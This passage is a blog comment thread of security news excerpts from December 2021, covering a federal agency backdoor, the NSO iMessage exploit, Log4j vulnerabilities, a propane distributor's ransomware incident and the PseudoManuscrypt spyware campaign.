A sophisticated threat actor has gained access and has backdoored the internal network of a US federal government agency, antivirus maker Avast reported this week. The security firm did not name the agency in its report, but The Record understands that the target of the attack was the United States Commission on International Religious Freedom (USCIRF). According to its website, the USCIRF is tasked with monitoring the right to freedom of religion and belief abroad and then making policy recommendations to the President, Secretary of State, and US Congress.
Tomi Engdahl says:
This image looks very different on Apple devices see for yourself
https://www.bleepingcomputer.com/news/technology/this-image-looks-very-different-on-apple-devices-see-for-yourself/
Take a good look at the image below and the device you are on. Now view it again on an Apple device. Conversely, if you are using an Apple device, view this page on an Android or Windows device. See
also: https://www.da.vidbuchanan.co.uk/widgets/pngdiff/
Tomi Engdahl says:
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution
https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html
Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works..
Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we’ve ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.
Tomi Engdahl says:
All Log4j, logback bugs we know so far and why you MUST ditch 2.15 https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/
Everyone’s heard of the critical log4j zero-day by now. Dubbed ‘Log4Shell, ‘ the vulnerability has already set the internet on fire.
Thus far, the log4j vulnerability, tracked as CVE-2021-44228, has been abused by all kinds of threat actors from state-backed hackers to ransomware gangs and others to inject Monero miners on vulnerable systems.
The Week in Ransomware – December 17th 2021 – Enter Log4j https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-17th-2021-enter-log4j/
A critical Apache Log4j vulnerability took the world by storm this week, and now it is being used by threat actors as part of their ransomware attacks.
Tomi Engdahl says:
Superior Plus, the number one propane distributor in Canada and number five distributor in the U.S., has reported a ransomware incident. It’s the second security incident involving a top company in the propane business in the last six months https://www.forbes.com/sites/leemathews/2021/12/16/one-of-north-americas-largest-propane-distributors-reports-ransomware-attack/
Superior reported having discovered the breach on December 12. The company’s announcement does not mention when the attackers originally gained access to its systems.
Tomi Engdahl says:
Thousands of Industrial Systems Targeted With New ‘PseudoManuscrypt’ Spyware
https://www.securityweek.com/thousands-industrial-systems-targeted-new-pseudomanuscrypt-spyware
Tens of thousands of devices around the world, including many industrial control systems (ICS) and government computers, have been targeted in what appears to be an espionage campaign that involves a new piece of malware dubbed PseudoManuscrypt, Kaspersky revealed on Thursday.
The attacks targeted 35,000 devices in 195 countries between January and November 2021, including devices housed by high-profile organizations. Roughly seven percent of the targets were ICS, with the engineering and building automation sectors being most impacted. Attacks were also aimed at military industrial enterprises and research laboratories.
Nearly one-third of the non-ICS devices targeted in this campaign were located in Russia, India and Brazil. As for ICS, the highest percentage of targets was observed in India, Vietnam and Russia.
The malware can steal VPN credentials, log keystrokes, capture the content of the screen (both images and video), record sound captured by the microphone, and steal clipboard and OS event log data.
PseudoManuscrypt has been distributed using pirated software installer archives — including ones related to ICS software — likely delivered by a malware-as-a-service platform. In some cases, the malware was delivered by the Glupteba botnet.